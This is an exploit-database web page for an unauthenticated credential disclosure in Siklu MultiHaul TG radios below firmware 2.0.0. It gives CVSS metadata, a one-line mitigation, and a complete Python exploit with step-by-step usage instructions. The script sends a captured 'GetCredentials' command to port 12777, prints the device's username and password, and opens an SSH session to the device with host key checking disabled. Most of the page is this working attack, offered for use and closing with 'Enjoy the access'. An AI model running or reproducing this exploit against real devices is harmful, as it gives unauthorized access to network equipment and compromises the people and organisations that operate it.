Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Siklu MultiHaul TG series - Unauthenticated Credential Disclosure - exploit.company
header-logo
Suggest Exploit
vendor:
MultiHaul TG series
by:
semaja2
6.1
CVSS
HIGH
Credential Disclosure
798
CWE
Product Name: MultiHaul TG series
Affected Version From: Version < 2.0.0
Affected Version To: Version < 2.0.0
Patch Exists: NO
Related CWE:
CPE: a:siklu:multihaultg_firmware:<2.0.0
Metasploit:
Other Scripts:
Platforms Tested:
2024

Siklu MultiHaul TG series – Unauthenticated Credential Disclosure

The Siklu MultiHaul TG series with a version less than 2.0.0 allows unauthenticated credential disclosure. By exploiting this vulnerability, an attacker can obtain random generated username and password, gaining unauthorized access to the device.

Mitigation:

Update to version 2.0.0 or higher to mitigate this vulnerability. Additionally, restrict network access to the device to trusted hosts only.
Source

Exploit-DB raw data:

# Exploit Title: Siklu MultiHaul TG series - unauthenticated credential disclosure
# Date: 28-02-2024
# Exploit Author: semaja2
# Vendor Homepage: https://siklu.com/
# Software Link: https://partners.siklu.com/home/frontdoor
# Version: < 2.0.0
# Tested on: 2.0.0
# CVE : None assigned
#
# Instructions
# 1. Perform IPv6 host detect by pinging all host multicast address for interface attached to device
# `ping6 -I en7 -c 2 ff02::1`
# 2. Review IPv6 neighbours and identify target device based on vendor component of MAC address
# `ip -6 neigh show dev en7`
# 3. Execute script
# `python3 tg-getcreds.py fe80::34d9:1337:b33f:7001%en7`
# 4. Enjoy the access



import socket
import sys
import os

address = str(sys.argv[1])  # the target
port = 12777

# Captured command, sends "GetCredentials" to obtain random generated username/password
cmd = bytearray.fromhex("000000290FFF000100000001000100000000800100010000000E47657443726564656E7469616C730000000000")

addrinfo = socket.getaddrinfo(address, port, socket.AF_INET6, socket.SOCK_STREAM)
(family, socktype, proto, canonname, sockaddr) = addrinfo[0]
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
s.connect(sockaddr)
s.send(cmd)
data = s.recv(200)
s.close()
output = "".join(map(chr, data))

# Split output, then remove trailing noise as string length is always 35
splits = output.split('#')
username = splits[1][slice(0, 35, 1)]
password = splits[2][slice(0, 35, 1)]
print('Username: ', username)
print('Password: ', password)
os.system("sshpass -p {password} ssh -o StrictHostKeychecking=no {address} -l {username}".format(address = address, username = username, password = password))

Navigation

Suggest Exploit

Services By CQR